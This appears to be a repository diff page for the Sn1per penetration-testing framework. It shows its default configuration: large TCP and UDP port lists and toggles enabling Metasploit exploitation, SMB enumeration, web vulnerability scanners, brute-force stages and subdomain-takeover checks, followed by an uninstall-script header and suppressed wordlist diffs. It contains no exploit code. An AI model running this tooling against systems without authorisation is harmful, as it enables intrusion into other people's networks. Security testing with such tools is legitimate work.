DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535"
DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,520,2049"
THREADS="30"
# NETWORK PLUGINS
NMAP_SCRIPTS="1"
METASPLOIT_EXPLOIT="1"
SSH_AUDIT="1"
SHOW_MOUNT="1"
RPC_INFO="1"
SMB_ENUM="1"
AMAP="1"
YASUO="1"
# OSINT PLUGINS
WHOIS="1"
GOOHAK="1"
INURLBR="1"
THEHARVESTER="1"
METAGOOFIL="1"
# ACTIVE WEB PLUGINS
BURP_SCAN="1"
NIKTO="1"
BLACKWIDOW="1"
CLUSTERD="1"
WPSCAN="1"
CMSMAP="1"
WAFWOOF="1"
WHATWEB="1"
WIG="1"
SHOCKER="1"
JEXBOSS="1"
# ACTIVE WEB BRUTE FORCE STAGES
WEB_BRUTE_STEALTHSCAN="1"
WEB_BRUTE_FULLSCAN="1"
WEB_BRUTE_EXPLOITSCAN="1"
# PASSIVE WEB PLUGINS
WAYBACKMACHINE="1"
SSL="1"
PASSIVE_SPIDER="1"
CUTYCAPT="1"
# EMAIL PLUGINS
SPOOF_CHECK="1"
# RECON PLUGINS
SLURP="1"
SUBLIST3R="1"
AMASS="1"
SUBFINDER="1"
DNSCAN="1"
CRTSH="1"
SUBOVER="1"
CLOUDHUNTER="0"
SSL="1"
PASSIVE_SPIDER="1"
BLACKWIDOW="1"

View File

@ -1,6 +1,7 @@
#!/bin/bash
# Uninstall script for Sn1per
# Created by @xer0dayz - https://xerosecurity.com
# VARS
OKBLUE='\033[94m'
OKRED='\033[91m'

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

1909
wordlists/domains-quick.txt Normal file

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff